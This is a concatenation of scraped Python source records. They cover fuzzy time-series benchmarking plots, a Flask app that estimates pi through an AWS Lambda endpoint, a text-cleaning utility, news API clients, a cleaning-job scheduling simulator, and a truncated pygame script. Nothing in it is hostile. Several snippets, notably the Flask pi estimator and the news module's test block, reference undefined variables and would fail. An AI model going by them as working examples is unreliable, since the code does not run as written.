plt.figure(figsize=[13, 6])\n fig.suptitle('Comparação de modelos ')\n ax0 = fig.add_axes([0, 0, 1, 1])\n rows = []\n for model in models_fo:\n fts = model['model']\n ax0.plot((model['forecasted']), label=(model['name']))\n\n for model in models_ho:\n fts = model['model']\n ax0.plot((model['forecasted']), label=(model['name']))\n\n handles0, labels0 = ax0.get_legend_handles_labels()\n ax0.legend(handles0, labels0)\n\n\ndef compareModelsTable(original, models_fo, models_ho):\n fig = plt.figure(figsize=[12, 4])\n fig.suptitle('Comparação de modelos ')\n columns = ['Modelo', 'Ordem', 'Partições', 'RMSE', 'MAPE (%)']\n rows = []\n for model in models_fo:\n fts = model['model']\n error_r = Measures.rmse(model['forecasted'], original)\n error_m = round(Measures.mape(model['forecasted'], original) * 100, 2)\n rows.append([model['name'], fts.order, len(fts.sets), error_r, error_m])\n\n for model in models_ho:\n fts = model['model']\n error_r = Measures.rmse(model['forecasted'][fts.order:], original[fts.order:])\n error_m = round(Measures.mape(model['forecasted'][fts.order:], original[fts.order:]) * 100, 2)\n rows.append([model['name'], fts.order, len(fts.sets), error_r, error_m])\n\n ax1 = fig.add_axes([0, 0, 1, 1])\n ax1.set_xticks([])\n ax1.set_yticks([])\n ax1.table(cellText=rows, colLabels=columns,\n cellLoc='center',\n bbox=[\n 0, 0, 1, 1])\n sup = '\\\\begin{tabular}{'\n header = ''\n body = ''\n footer = ''\n for c in columns:\n sup = sup + '|c'\n if len(header) > 0:\n header = header + ' & '\n header = header + '\\\\textbf{' + c + '} '\n\n sup = sup + '|} \\\\hline\\n'\n header = header + '\\\\\\\\ \\\\hline \\n'\n for r in rows:\n lin = ''\n for c in r:\n if len(lin) > 0:\n lin = lin + ' & '\n lin = lin + str(c)\n\n body = body + lin + '\\\\\\\\ \\\\hline \\n'\n\n return sup + header + body + '\\\\end{tabular}'\n\n\ndef simpleSearch_RMSE(train, test, model, partitions, orders, save=False, file=None, tam=[10, 15], plotforecasts=False, elev=30, azim=144, intervals=False, parameters=None, partitioner=Grid.GridPartitioner, transformation=None, indexer=None):\n _3d = len(orders) > 1\n ret = []\n if _3d:\n errors = np.array([[0 for k in range(len(partitions))] for kk in range(len(orders))])\n else:\n errors = []\n forecasted_best = []\n fig = plt.figure(figsize=tam)\n if plotforecasts:\n ax0 = fig.add_axes([0, 0.4, 0.9, 0.5])\n ax0.set_xlim([0, len(train)])\n ax0.set_ylim([min(train) * 0.9, max(train) * 1.1])\n ax0.set_title('Forecasts')\n ax0.set_ylabel('F(T)')\n ax0.set_xlabel('T')\n else:\n min_rmse = 1000000.0\n best = None\n for pc, p in enumerate(partitions, start=0):\n sets = partitioner(data=train, npart=p, transformation=transformation).sets\n for oc, o in enumerate(orders, start=0):\n fts = model('q = ' + str(p) + ' n = ' + str(o))\n fts.append_transformation(transformation)\n fts.train(train, sets=sets, order=o, parameters=parameters)\n if not intervals:\n forecasted = fts.forecast(test)\n if not fts.has_seasonality:\n error = Measures.rmse(np.array(test[o:]), np.array(forecasted[:-1]))\n else:\n error = Measures.rmse(np.array(test[o:]), np.array(forecasted))\n for kk in range(o):\n forecasted.insert(0, None)\n\n if plotforecasts:\n ax0.plot(forecasted, label=(fts.name))\n else:\n forecasted = fts.forecast_interval(test)\n error = 1.0 - Measures.rmse_interval(np.array(test[o:]), np.array(forecasted[:-1]))\n if _3d:\n errors[(oc, pc)] = error\n else:\n errors.append(error)\n if error < min_rmse:\n min_rmse = error\n best = fts\n forecasted_best = forecasted\n\n if plotforecasts:\n ax0.plot(test, label='Original', linewidth=3.0, color='black')\n if _3d:\n ax1 = Axes3D(fig, rect=[0, 1, 0.9, 0.9], elev=elev, azim=azim)\n if _3d and not plotforecasts:\n ax1 = Axes3D(fig, rect=[0, 1, 0.9, 0.9], elev=elev, azim=azim)\n ax1.set_title('Error Surface')\n ax1.set_ylabel('Model order')\n ax1.set_xlabel('Number of partitions')\n ax1.set_zlabel('RMSE')\n X, Y = np.meshgrid(partitions, orders)\n surf = ax1.plot_surface(X, Y, errors, rstride=1, cstride=1, antialiased=True)\n else:\n ax1 = fig.add_axes([0, 1, 0.9, 0.9])\n ax1.set_title('Error Curve')\n ax1.set_xlabel('Number of partitions')\n ax1.set_ylabel('RMSE')\n ax1.plot(partitions, errors)\n ret.append(best)\n ret.append(forecasted_best)\n ret.append(min_rmse)\n cUtil.show_and_save_image(fig, file, save)\n return ret\n\n\ndef pftsExploreOrderAndPartitions(data, save=False, file=None):\n fig, axes = plt.subplots(nrows=4, ncols=1, figsize=[6, 8])\n data_fs1 = Grid.GridPartitioner(data=data, npart=10).sets\n mi = []\n ma = []\n axes[0].set_title('Point Forecasts by Order')\n axes[2].set_title('Interval Forecasts by Order')\n for order in np.arange(1, 6):\n fts = pwfts.ProbabilisticWeightedFTS('')\n fts.shortname = 'n = ' + str(order)\n fts.train(data, sets=(data_fs1.sets), order=order)\n point_forecasts = fts.forecast(data)\n interval_forecasts = fts.forecast_interval(data)\n lower = [kk[0] for kk in interval_forecasts]\n upper = [kk[1] for kk in interval_forecasts]\n mi.append(min(lower) * 0.95)\n ma.append(max(upper) * 1.05)\n for k in np.arange(0, order):\n point_forecasts.insert(0, None)\n lower.insert(0, None)\n upper.insert(0, None)\n\n axes[0].plot(point_forecasts, label=(fts.shortname))\n axes[2].plot(lower, label=(fts.shortname))\n axes[2].plot(upper)\n\n axes[1].set_title('Point Forecasts by Number of Partitions')\n axes[3].set_title('Interval Forecasts by Number of Partitions')\n for partitions in np.arange(5, 11):\n data_fs = Grid.GridPartitioner(data=data, npart=partitions).sets\n fts = pwfts.ProbabilisticWeightedFTS('')\n fts.shortname = 'q = ' + str(partitions)\n fts.train(data, sets=(data_fs.sets), order=1)\n point_forecasts = fts.forecast(data)\n interval_forecasts = fts.forecast_interval(data)\n lower = [kk[0] for kk in interval_forecasts]\n upper = [kk[1] for kk in interval_forecasts]\n mi.append(min(lower) * 0.95)\n ma.append(max(upper) * 1.05)\n point_forecasts.insert(0, None)\n lower.insert(0, None)\n upper.insert(0, None)\n axes[1].plot(point_forecasts, label=(fts.shortname))\n axes[3].plot(lower, label=(fts.shortname))\n axes[3].plot(upper)\n\n for ax in axes:\n ax.set_ylabel('F(T)')\n ax.set_xlabel('T')\n ax.plot(data, label='Original', color='black', linewidth=1.5)\n handles, labels = ax.get_legend_handles_labels()\n ax.legend(handles, labels, loc=2, bbox_to_anchor=(1, 1))\n ax.set_ylim([min(mi), max(ma)])\n ax.set_xlim([0, len(data)])\n\n plt.tight_layout()\n cUtil.show_and_save_image(fig, file, save)","sub_path":"pycfiles/pyfttt-0.3.2-py2.py3-none-any/benchmarks.cpython-36.py","file_name":"benchmarks.cpython-36.py","file_ext":"py","file_size_in_byte":40600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"495333967","text":"from flask import Flask, flash, redirect, render_template,request, url_for\nimport math\nimport base64\nimport concurrent.futures\nimport itertools\nimport http.client\nimport time\nfrom multiprocessing.pool import ThreadPool\nfrom threading import Thread\nimport ast\nimport pandas as pd\nimport random\nimport os\nimport io\nimport math\nimport boto3\nfrom io import StringIO\napp = Flask(__name__)\napp.secret_key = os.urandom(24)\n\n\ndef estimate_pi(args,result,index):\n shots = args[0]\n rate_reporting = args[1]\n id_process = args[2]\n c = http.client.HTTPSConnection(\"eqfupdwvib.execute-api.eu-west-2.amazonaws.com\")\n json= '{\"shots\":\"'+str(shots)+'\",\"reporting_rate\":\"'+str(reporting_rate)+'\",\"process_id\":'+str(process_id)+'}'\n \n c.request(\"POST\", \"/default/pi_estimation\", json)\n \n response = c.getresponse()\n data = ast.literal_eval(response.read().decode(\"utf-8\").strip('\"'))\n result[index] = data\n\n\n\n\n\n@app.route('/get_user_data', methods=['POST','GET'])\ndef userpath():\n\n # number of Shots \n shots = int(request.form[\"shots\"])\n if shots%1000 != 0:\n flash('Error')\n return redirect(url_for('index'))\n\n \n service = request.form[\"service\"] \n\n #Reporting rate\n reporting_rate = int(request.form[\"reporting_rate\"])\n if reporting_rate > shots:\n flash('Reporting rate should be less than shots')\n return redirect(url_for('index')) \n\n #resources\n resources_count = int(request.form[\"resources\"] )\n if resources_count > shots:\n flash('resources should be less than shots')\n return redirect(url_for('index')) \n\n #Resource functionality\n ten_percent = int(0.1 * (shots/resources_count))\n result_1= [int(shots/resources_count)] * resources_count\n result_1[0] = result_1[0] + max(reporting_rate,ten_percent_s_by_r)\n result_1[-1] = result_1[-1] - max(reporting_rate,ten_percent_s_by_r)\n\n\n counter = itertools.count(0)\n processes = [[shots,reporting_rate,next(counter)] for shots in result_1]\n\n if service == 'Lambda':\n triplets = []\n start = time.time()\n\n pool = ThreadPool(processes=len(processes))\n\n\n threads = [None] * len(processes)\n results = [None] * len(processes)\n\n for i in range(len(threads)):\n threads[i] = Thread(target=estimate_pi, args=(processes[i], results, i))\n threads[i].start()\n\n # do some other stuff\n\n for i in range(len(threads)):\n threads[i].join()\n\n \n \n \n \n\n time_taken = time.time() - start\n\n total_list = [a for b in results for a in b]\n\n triple_table = pd.DataFrame(total_list,columns = [\"process\",\"incircle\",\"shots\",\"iterating_shots_val\"])\n\n distinct_processes = list(triple_table['process'].unique())\n\n #print(distinct_processes)\n estimates = []\n for k in range(0,len(distinct_processes)):\n \n if distinct_processes[k] == distinct_processes[0]:\n base_shots = 0\n base_incircle = 0\n else:\n base_df = triplets_table[triplets_table['process'] == distinct_processes[k-1]].reset_index(drop=True)\n base_shots = base_df['shots'][len(base_df)-1]\n base_incircle = base_df['incircle'][len(base_df)-1] \n \n current_process_results = triplets_table[triplets_table['process'] == distinct_processes[k]].reset_index(drop=True)\n\n for q in range(0,len(current_process_results)):\n pi_estimates.append(4*(base_incircle+current_process_results['incircle'][q])/(base_shots+current_process_results['iterating_shots_val'][q]))\n\n\n #image Charts\n final_pi_val = estimates[-1]\n pi_estimates_str = [str(z) for z in estimates]\n pi_estimates_str = \",\".join(pi_estimates_str)\n \n const_line = \",\".join([str(math.pi) for o in range(0,len(estimates))])\n\n \n\n return render_template('chart.htm',tables=[triplets_table.to_html(classes='data')], piestimates =pi_estimates_str ,piline =const_line, titles=triplets_table.columns.values,text = \"Estimated value of pi is \"+str(final_pi_val))\n\n\n@app.route('/', methods=['GET','POST'])\ndef index():\n\n return render_template('index.htm')\n\n\nif __name__ == \"__main__\":\n #run_server()\n app.run(threaded=True,debug=True)\n\n\n\n","sub_path":"Cloud_LSA/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":4366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"585812044","text":"import re\n\nfrom bs4 import BeautifulSoup\nfrom nltk.corpus import stopwords\n\n\nclass Utility(object):\n \"\"\"KaggleWord2VecUtility is a utility class for processing raw HTML text into segments for further learning\"\"\"\n\n @staticmethod\n def review_to_wordlist( review, remove_stopwords=False, remove_numbers=True):\n # Function to convert a document to a sequence of words,\n # optionally removing stop words. Returns a list of words.\n #\n # 1. Remove HTML\n review_text = BeautifulSoup(review).get_text()\n #\n # 2. Remove non-letters and non-numbers\n review_text = re.sub(\"[^a-zA-Z0-9]\", \" \", review_text)\n #\n # 2.5 Optionally remove numbers\n if remove_numbers:\n review_text = re.sub(\"[0-9]\", \" \", review_text)\n else:\n review_text = review_text.replace('0', ' zero ')\n review_text = review_text.replace('1', ' one ')\n review_text = review_text.replace('2', ' two ')\n review_text = review_text.replace('3', ' three ')\n review_text = review_text.replace('4', ' four ')\n review_text = review_text.replace('5', ' five ')\n review_text = review_text.replace('6', ' six ')\n review_text = review_text.replace('7', ' seven ')\n review_text = review_text.replace('8', ' eight ')\n review_text = review_text.replace('9', ' nine ')\n #\n # 3. Convert words to lower case and split them\n words = review_text.lower().split()\n #\n # 4. Optionally remove stop words (false by default)\n if remove_stopwords:\n stops = set(stopwords.words(\"english\"))\n words = [w for w in words if not w in stops]\n #\n # 5. Return a list of words\n return(words)\n\n # Define a function to split a review into parsed sentences\n @staticmethod\n def review_to_sentences( review, tokenizer, remove_stopwords=False, remove_numbers=True):\n # Function to split a review into parsed sentences. Returns a\n # list of sentences, where each sentence is a list of words\n #\n # 1. Use the NLTK tokenizer to split the paragraph into sentences\n raw_sentences = tokenizer.tokenize(review.decode('utf8').strip())\n #\n # 2. Loop over each sentence\n sentences = []\n for raw_sentence in raw_sentences:\n # If a sentence is empty, skip it\n if len(raw_sentence) > 0:\n # Otherwise, call review_to_wordlist to get a list of words\n sentences.append(Utility.review_to_wordlist(raw_sentence, \\\n remove_stopwords, remove_numbers))\n #\n # Return the list of sentences (each sentence is a list of words,\n # so this returns a list of lists\n return sentences","sub_path":"research/Utility.py","file_name":"Utility.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"207588432","text":"import requests\nimport json\nimport yaml\nimport os\n\nfrom newsapi import NewsApiClient\nfrom flask import Flask, make_response, jsonify\n\nfrom parlai.agents.programr.utils.logging.ylogger import YLogger\nfrom parlai.agents.programr.services.service import Service\n\n\nclass NewsAPI(object):\n # NOTE: website of the news api\n # https://newsapi.org\n\n def __init__(self, api_key):\n self.api_key = api_key\n\n # NOTE: sources is a str to identify what news source to pull from\n # ex: 'bbc-news'\n # You can find a list of acceptable country codes here:\n # https://github.com/mattlisiv/newsapi-python/blob/master/newsapi/const.py\n def headlines(self, sources=None, country=None):\n return NewsApiClient(self.api_key).get_top_headlines(sources=sources, country=country)\n\n\nclass NewsService(Service):\n def __init__(self, config=None):\n Service.__init__(self, config)\n self._current_article = 0\n self.api_key = config.api_key\n self.api = NewsAPI(self.api_key)\n\n def get_content_info(self, top_headlines):\n content = top_headlines['articles'][self._current_article]['content']\n return content\n\n def get_title_info(self, top_headlines):\n title = top_headlines['articles'][self._current_article]['title']\n return title\n\n def get_description_info(self, top_headlines):\n description = top_headlines['articles'][self._current_article]['description']\n return description\n\n def clean_text(self, text):\n text = text.replace(\"Image copyrightReutersImage caption\", \"\")\n text = text.replace(\"\\n\", \" \")\n text.encode(\"ascii\", errors=\"ignore\")\n # summary = re.sub('\\[.*\\]', '', summary)\n return text\n\n def format_response(self, top_headlines):\n description = self.get_description_info(top_headlines)\n title = self.get_title_info(top_headlines)\n\n search = f\"The title of the article is {title}, here is a quick summary...{description} .\"\n search += \" Should I read the full article?\"\n return search\n\n def ask_question(self, question: str):\n try:\n words = question.split()\n question = \" \".join(words[1:])\n if words[0] == 'HEADLINES':\n search = self.api.headlines(sources='bbc-news')\n search = search['articles'][self._current_article]['title']\n\n elif words[0] == 'NEXT':\n self._current_article += 1\n search = self.api.headlines(sources='bbc-news')\n search = search['articles'][self._current_article]['title']\n\n elif words[0] == 'PREVIOUS':\n self._current_article -= 1\n search = self.api.headlines(sources='bbc-news')\n search = search['articles'][self._current_article]['title']\n\n else:\n YLogger.error(self, \"Unknown News API command [%s]\", words[0])\n search = \"\"\n\n return search\n except Exception as ex:\n YLogger.error(self, \"General error querying News API for question [%s]\", question)\n YLogger.error(self, f\"Exception message: {ex}\")\n return \"\"\n\nclass BingAPI(object):\n def __init__(self, url, headers, params=None):\n self.url = url\n self.headers = headers\n self.params = params\n self._current_article = 0\n\n def bing_headlines(self):\n try:\n response = requests.request(\"GET\", url=self.url, headers=self.headers, params=self.params)\n headline_dict = response.json()\n headline = headline_dict['value'][self._current_article]['name']\n return headline\n except Exception as ex:\n print(\"error getting request. {}\".format(ex))\n return \"\"\n\n\nclass BingNewsService(Service):\n def __init__(self, config=None):\n Service.__init__(self, config)\n self._current_article = 0\n self._url = os.getenv(\"NEWS_URL\")\n self._headers = {\n \"x-rapidapi-host\": os.getenv(\"NEWS_HEADERS_HOST\"),\n \"x-rapidapi-key\": os.getenv(\"NEWS_HEADERS_KEY\")\n }\n self.api = BingAPI(self._url, self._headers)\n\n def init_api(self, url, headers):\n self._url = url\n self._headers = headers\n self.api = BingAPI(self._url, self._headers)\n\n def get_content_info(self, top_headlines):\n content = top_headlines['articles'][self._current_article]['content']\n return content\n\n def get_title_info(self, top_headlines):\n title = top_headlines['articles'][self._current_article]['title']\n return title\n\n def get_description_info(self, top_headlines):\n description = top_headlines['articles'][self._current_article]['description']\n return description\n\n def clean_text(self, text):\n text = text.replace(\"Image copyrightReutersImage caption\", \"\")\n text = text.replace(\"\\n\", \" \")\n text.encode(\"ascii\", errors=\"ignore\")\n # summary = re.sub('\\[.*\\]', '', summary)\n return text\n\n def format_response(self, top_headlines):\n description = self.get_description_info(top_headlines)\n title = self.get_title_info(top_headlines)\n\n search = f\"The title of the article is {title}, here is a quick summary...{description} .\"\n search += \" Should I read the full article?\"\n return search\n\n def ask_question(self, question: str):\n try:\n words = question.split()\n question = \" \".join(words[1:])\n if words[0] == 'HEADLINES':\n search = self.api.bing_headlines()\n elif words[0] == 'NEXT':\n self.api._current_article += 1\n search = self.api.bing_headlines()\n elif words[0] == 'PREVIOUS':\n self.api._current_article -= 1\n search = self.api.bing_headlines()\n else:\n YLogger.error(\"Unknown News API command [%s]\", words[0])\n search = \"\"\n return search\n except Exception as ex:\n YLogger.error(\"General error querying News API for question [%s]\", question)\n YLogger.error(\"Exception message: [%s]\", ex)\n return \"\"\n\n\nif __name__ == \"__main__\":\n print(\"Testing news service.\")\n\n c = BingNewsService()\n\n # params = {\"Category\":\"sports\"}\n\n headers = {\n 'x-rapidapi-host': url,\n 'x-rapidapi-key': key\n }\n\n c.init_api(url, headers)\n\n headline = c.ask_question(\"HEADLINES\")\n print(headline)\n\n headline = c.ask_question(\"NEXT\")\n print(headline)\n #\n # headline = c.ask_news(\"NEXT us\")\n # print(headline)\n #\n # headline = c.ask_news(\"PREVIOUS us\")\n # print(headline)\n","sub_path":"parlai/agents/programr/services/news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":6744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"541167425","text":"# -*- coding: utf-8 -*-\n'''\n 用于创建模拟派单的数据\n'''\nimport math\nimport datetime as dt\nimport time\nimport random\nimport json\nimport numpy as np\nimport pandas as pd\n\nfrom api.models.models import *\nimport api.common_func.area as my_area\nfrom .sch_api import *\n# from .to_task import *\nfrom api.common_func.cluster_address import cluster\n\n\ndef random_period(day_str):\n t = datetime.strptime(day_str + ' 6:00', \"%Y-%m-%d %H:%M\")\n p = random.randint(0, 14)\n t1 = dt.timedelta(seconds=3600 * p)\n start = t + t1\n if p < 14:\n p2 = random.randint(2, 16 - p)\n else:\n p2 = 2\n end = start + dt.timedelta(seconds=3600 * p2)\n return start, end\n\n\ndef gen_client_orders(regions, workday, n_order, n_address):\n '''\n gen orders to simulate\n\n output:\n order array:\n job_type: 2: 20min, 3:30min, 4:40min\n '''\n\n orders = []\n for x in range(n_order - 1):\n start_time, end_time = random_period(workday)\n job_type = random.randint(2, 4)\n hrs = (job_type * 600) / 3600\n addr = random.randint(1, n_address)\n if len(regions) < 2:\n region_id = regions[0]\n else:\n region_id = regions[random.randint(0, len(regions) - 1)]\n sim_addr = my_area.gen_loc(region_id)\n address = sim_addr[1]\n lat, lon = sim_addr[0].split(',')\n orders.append({\n 'city': u\"上海市\",\n 'region_id': region_id,\n 'order_id': random.randint(10000, 20000),\n 'address': address,\n 'addr': '',\n 'start_time': start_time,\n 'end_time': end_time,\n 'job_type': job_type,\n 'hrs': hrs,\n 'addr_lat': lat,\n 'addr_lon': lon\n })\n jobs = pd.DataFrame([x for x in orders])\n return jobs\n\n\ndef gen_worker(regions, day_str, n_worker):\n '''\n worker_type: \n 1: 全职 \n 2: 兼职 \n 3: 特服\n\n min_hrs : bdt 应派工时\n mdt_hrs: 技师名下订单工时\n '''\n workers = []\n for w in range(n_worker):\n tp = random.randint(1, 20)\n w_rank = random.randint(100, 500)\n if len(regions) < 2:\n region_id = regions[0]\n else:\n region_id = regions[random.randint(0, len(regions) - 1)]\n if tp % 4 == 1:\n worker_type = 3\n w_type = u'兼职'\n s1 = random.randint(0, 8)\n w_start = dt.datetime.strptime(\n day_str + ' 6:00', \"%Y-%m-%d %H:%M\") + dt.timedelta(seconds=3600*s1)\n w_end = w_start + dt.timedelta(seconds=3600*4)\n w_hrs = 4\n max_star_t = random.randint(2, 4)\n mdt = random.randint(0, 8)\n elif tp % 5 == 0:\n worker_type = 3\n w_type = u'特服'\n w_start = dt.datetime.strptime(day_str + ' 6:00', \"%Y-%m-%d %H:%M\")\n w_end = w_start + dt.timedelta(seconds=3600*1*8)\n w_hrs = 8\n max_star_t = 8\n mdt = 0\n w_rank = 0\n else:\n s1 = random.randint(0, 8)\n worker_type = 1\n w_type = u'全职'\n w_start = dt.datetime.strptime(\n day_str + ' 6:00', \"%Y-%m-%d %H:%M\") + dt.timedelta(seconds=3600*s1)\n w_end = w_start + dt.timedelta(seconds=3600*1*8)\n w_hrs = 8\n max_star_t = random.randint(4, 8)\n mdt = random.randint(0, 12)\n\n workers.append({\n 'city': u\"上海市\",\n 'worker_id': w + 1,\n 'w_start': w_start, # : 工作开始时间\n 'w_end': w_end, # :工作结束时间\n 'worker_type': worker_type,\n # 'w_type': w_type,\n 'w_hrs': w_hrs, # 可用工时\n 'w_region': region_id, # 开工地点(区域id)\n 'w_rank': w_rank, # 星级\n 'max_star_t': max_star_t, # 按星级最大派单工时\n 'mdt': mdt, # 技师名下订单\n 'hrs_to_assign': 0,\n 'hrs_assigned': 0,\n 'adt_hrs': 0\n })\n workers = pd.DataFrame([wr for wr in workers]).sort_values(\n ['worker_type', 'w_start', 'w_region'])\n #: 确定最小派单工时\n workers.loc[:, 'min_hrs'] = np.where(\n workers.max_star_t < workers.w_hrs, workers.max_star_t, workers.w_hrs)\n workers.loc[:, 'bdt_hrs'] = np.where(\n workers.mdt < workers.min_hrs, workers.mdt, workers.min_hrs)\n workers = workers.sort_values(\n ['worker_type', 'hrs_to_assign', 'w_rank'], ascending=[1, 0, 0])\n return workers\n\n\ndef start_multi_region_sch(city, sch_date_str):\n \"\"\"\n multi region sch main\n \"\"\"\n #: create SchTask\n task_name = 'schedule of ' + dt.datetime.today().date().isoformat()\n # st = SchTask(city)\n\n # sch_task_id = st.create(sch_date_str, task_name)\n\n sch_dt = dt.datetime.strptime(sch_date_str, \"%Y-%m-%d\")\n new_task = SchTaskM(city=city, sch_date=sch_date_str,\n name=task_name, status='started')\n db.session.add(new_task)\n db.session.flush()\n sch_task_id = new_task.id\n #: mark job data, count region\n sh = SchJobs(city)\n region_counts = sh.mark_unsch_jobs(sch_dt, sch_task_id)\n\n #: create subtask by region\n if region_counts is None:\n return dict(message='no open jobs')\n\n for r in region_counts:\n region_id = r['region_id']\n region_jobs_count = r['region_jobs']\n sub_task_uid = str(sch_task_id) + '-' + region_id\n\n # issue region sch 使用 celery task\n # from api.new_task import region_job_sch\n # celery_task = region_job_sch.delay(sch_task_id, region_id, sch_date_str)\n # sub_task_uid = celery_task.id\n\n #: create sub_task records\n st = SubTaskM(\n city=city,\n sch_task_id=sch_task_id,\n sub_task_uid=sub_task_uid,\n sch_date=sch_dt,\n status='started',\n region_id=region_id,\n job_num=region_jobs_count\n )\n db.session.add(st)\n db.session.flush()\n\n #: 按 region 派单 不使用 celery\n sch_tomorrow_by_region(sch_task_id, region_id,\n sub_task_uid, sch_date_str, city=\"上海市\")\n\n db.session.commit()\n return\n\n\ndef update_celety_status(celery_uid, data):\n \"\"\"\n update celery task result\n \"\"\"\n sub_task = SubTaskM.find(sub_task_uid=celery_uid)\n if sub_task.one_or_none():\n sub_task.update(data)\n db.session.commit()\n return row2dict(sub_task.one())\n else:\n return\n\n\ndef check_task_status(sch_task_id):\n \"\"\"\n check task 's all sub, decide next step\n \"\"\"\n sub_tasks = SubTaskM.find(sch_task_id=sch_task_id, status='started').all()\n if len(sub_tasks) == 0:\n sch_task = SchTaskM.find(id=sch_task_id).one_or_none()\n if sch_task:\n sch_task.update(dict(status='stage2'))\n schedule_step2(sch_task_id)\n db.session.commit()\n\n\ndef sch_tomorrow_by_region(task_id, region_id, celery_uid, sch_date_str, city=\"上海市\"):\n \"\"\"\n step1: 按region 派单\n \"\"\"\n # 获取数据,region Jobs\n sch_job = SchJobs(city)\n region_jobs = sch_job.get_open_job_by_task_region(task_id, region_id)\n\n if region_jobs is None:\n data = dict(job_num=0, status='done', sub_task_message='no open jobs')\n update_celety_status(celery_uid, data)\n check_task_status(task_id)\n return dict(status='error', msg='no jobs', data='')\n\n job_num = len(region_jobs)\n df_addr = region_jobs.groupby('address').agg(\n {\"addr_lat\": 'last', 'addr_lon': 'last'})\n X = np.array(df_addr)\n #: Cluster Addr\n addr_labels, lat_label = cluster(X)\n # addr_labels = cluster_addr(X)\n df_addr.loc[:, 'addr'] = addr_labels\n region_jobs = pd.merge(region_jobs, df_addr, how='left', left_on='address',\n left_index=False, right_index=True, sort=True,\n suffixes=('', '_y'), copy=True, indicator=False,\n validate=None)\n region_jobs.loc[:, 'addr'] = region_jobs.addr_y\n region_jobs = region_jobs.loc[:,\n (u'addr', u'end_time', u'hrs', u'job_type', u'order_id', u'region_id', 'hrs_t',\n u'sch_task_id', 'status', u'city', 'sch_date', u'start_time', u'worker_id', u'addr_lat', u'addr_lon')]\n sch_workers = SchWorkers(city)\n region_wkrs = sch_workers.all_worker_by_date(sch_date_str, region_id)\n if region_wkrs is None:\n data = dict(job_num=job_num, status='done',\n sub_task_message='no free worker')\n update_celety_status(celery_uid, data)\n check_task_status(task_id)\n return dict(status='error', msg='no workers', data='')\n\n # return \"Done\"\n assigned_jobs, open_jobs, worker_summary, arranged_workers = dispatch_region_jobs(\n region_jobs, region_wkrs, sch_date_str)\n\n # update assigned_jobs to database\n if not assigned_jobs.empty:\n save_assign_jobs_db(assigned_jobs)\n\n if not open_jobs.empty:\n # open_jobs_dict = open_jobs.drop(['hrs_t'], 1).to_dict('records')\n open_job_num = len(open_jobs)\n else:\n open_job_num = 0\n data = dict(job_num=job_num, open_job_num=open_job_num,\n status='done', sub_task_message='step 1 done')\n update_celety_status(celery_uid, data)\n return\n\n\ndef schedule_step2(sch_task_id, city=\"上海市\"):\n \"\"\"\n activated by last region schedule task\n \"\"\"\n sch_job = SchJobs(city)\n sch_workers = SchWorkers(city)\n\n open_jobs = sch_job.get_open_job_by_task_region(sch_task_id)\n if open_jobs is None:\n return\n sch_date_str = open_jobs.iloc[0].sch_date\n\n if len(open_jobs):\n #: sort by region\n open_by_region = open_jobs.groupby('region_id').agg({\n 'order_id': 'count',\n 'start_time': np.min,\n 'end_time': np.max,\n 'hrs': 'sum'\n }).sort_values(['hrs'], ascending=[0])\n\n #: iter by region\n #: find near area\n for idx, row in open_by_region.iterrows():\n nearby_list = near_area_data(idx)\n #: get region_jobs open\n region_jobs = open_jobs.loc[open_jobs.region_id == idx]\n\n #: get nearby worker\n for n in nearby_list:\n near_region_id = n['area_id']\n ridding_time = n['ridding_time']\n region_wkrs = sch_workers.all_worker_by_date(\n sch_date_str, near_region_id)\n if region_wkrs is not None:\n assigned_jobs, open_jobs, worker_summary, arranged_workers = dispatch_region_jobs(\n region_jobs, region_wkrs, sch_date_str)\n if assigned_jobs is not None:\n save_assign_jobs_db(assigned_jobs)\n\n return sch_task_id\n\n\ndef save_assign_jobs_db(assigned_jobs):\n \"\"\"\n save assigned_jobs dataframe to db\n \"\"\"\n if 'grp' in assigned_jobs:\n assigned_jobs = assigned_jobs.drop(\n ['grp', 'hrs_t', 'trans_hr', 'wait_hr'], 1)\n assigned_jobs.start_time = assigned_jobs.start_time.apply(\n lambda x: x.strftime('%Y-%m-%d %H:%M'))\n assigned_jobs.end_time = assigned_jobs.end_time.apply(\n lambda x: x.strftime('%Y-%m-%d %H:%M'))\n assigned_jobs.plan_end = assigned_jobs.plan_end.apply(\n lambda x: x.strftime('%Y-%m-%d %H:%M'))\n assigned_jobs.plan_start = assigned_jobs.plan_start.apply(\n lambda x: x.strftime('%Y-%m-%d %H:%M'))\n assigned_jobs.status = 'assigned'\n\n to_update = assigned_jobs.to_dict('records')\n for x in to_update:\n SchJobsM.query.filter(SchJobsM.order_id == x['order_id']).update(x)\n db.session.flush()\n try:\n db.session.commit()\n except:\n db.session.rollback()\n return 'ok'\n\n\ndef near_area_data(region_id):\n \"\"\"\n return:\n [\n {'area_id': 439, 'ridding_time': 1349}, \n {'area_id': 441, 'ridding_time': 1544}, \n {'area_id': 410, 'ridding_time': 1594}, \n {'area_id': 470, 'ridding_time': 1618}, \n {'area_id': 411, 'ridding_time': 2089}, \n {'area_id': 471, 'ridding_time': 2112}, \n {'area_id': 409, 'ridding_time': 2281}, \n {'area_id': 469, 'ridding_time': 3229}\n ]\n \"\"\"\n n_area = my_area.NearbyM()\n\n _nears = n_area.get_nearby(region_id)['nearby']\n nearby_list = []\n for (k, v) in _nears.items():\n if bool(v):\n nearby_list.append(\n dict(area_id=v['area_id'], ridding_time=v['ridding_time']))\n print(nearby_list)\n nearby_list = sorted(nearby_list, key=lambda x: x['ridding_time'])\n return nearby_list\n","sub_path":"api/modules/scheduler/sch_sim.py","file_name":"sch_sim.py","file_ext":"py","file_size_in_byte":12797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"401455802","text":"#!/usr/bin/env python3\n# -*- utf-8 -*-\n#\n# http://eyehere.net/2011/python-pygame-novice-professional-2/\n#\n# Karl.Lv@outlook.com, KarlLv@126.com\n# 14 July, 2017\n#\n\nimport pygame\nfrom pygame.locals import *\nfrom sys import exit\n\nimport time\n\npygame.init()\n\nSCREEN_SIZE = (640, 480)\nscreen = pygame.display.set_mode(SCREEN_SIZE, 0, 32)\n\nfont = pygame.font.SysFont(\"dejavu-serif\", 